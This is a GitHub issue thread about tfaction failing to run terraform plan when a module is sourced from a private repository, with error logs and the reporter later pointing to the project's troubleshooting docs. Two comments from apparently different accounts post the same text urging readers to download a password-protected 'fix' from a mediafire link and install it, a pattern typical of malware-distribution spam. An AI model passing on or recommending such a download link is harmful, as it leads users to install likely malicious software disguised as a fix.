### ISSUE TITLE
Unable to plan with private repository module

### ISSUE THREAD

**Issue by sato-s** [suzuki-shunsuke/tfaction#1783]
### tfaction version

1.5.2

### Overview

If we have module that references private repository as a source, `suzuki-shunsuke/tfaction/test-module` fails.

### How to reproduce

tfaction-root.yaml

```yaml

```

tfaction.yaml

```yaml

```

GitHub Actions Workflow

```yaml

```

Other related code such as local Registry

```
module "api" {
  source = "git::https://github.com/***/******//gcp/modules/project-api?ref=refs/tags/module_gcp_modules_v0.0.0"

  activate_apis = [
    "cloudidentity.googleapis.com",
  ]
}

```

GitHub Actions' log

```
│ Error: Failed to download module
│ 
│   on api.tf line 1:
│    1: module "api" {
│ 
│ Could not download module "api" (api.tf:1) source code from
│ "git::https://github.com/****/*****?ref=refs/tags/module_gcp_modules_v0.0.0":
│ error downloading
│ 'https://github.com/****/*****?ref=refs%2Ftags%2Fmodule_gcp_modules_v0.0.0':
│ /usr/bin/git exited with 128: Cloning into '.*****/modules/api'...
│ fatal: could not read Username for 'https://github.com': No such device or
│ address
│ 
```

### Expected behaviour

`suzuki-shunsuke/tfaction/test-module` executes terraform plan

### Actual behaviour

`suzuki-shunsuke/tfaction/test-module` fail with a following error message.

```
│ Error: Failed to download module
│ 
│   on api.tf line 1:
│    1: module "api" {
│ 
│ Could not download module "api" (api.tf:1) source code from
│ "git::https://github.com/****/*****?ref=refs/tags/module_gcp_modules_v0.0.0":
│ error downloading
│ 'https://github.com/****/*****?ref=refs%2Ftags%2Fmodule_gcp_modules_v0.0.0':
│ /usr/bin/git exited with 128: Cloning into '.*****/modules/api'...
│ fatal: could not read Username for 'https://github.com': No such device or
│ address
│ 
``` 

### Important Factoids

I think this error is related to https://github.com/hashicorp/setup-terraform/issues/33 
But I don't know how to fix this in tfaction.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sato-s** [comment]
Sorry! Found solution here.
https://suzuki-shunsuke.github.io/tfaction/docs/feature/module/#bulb-trouble-shooting-about-downloading-private-modules
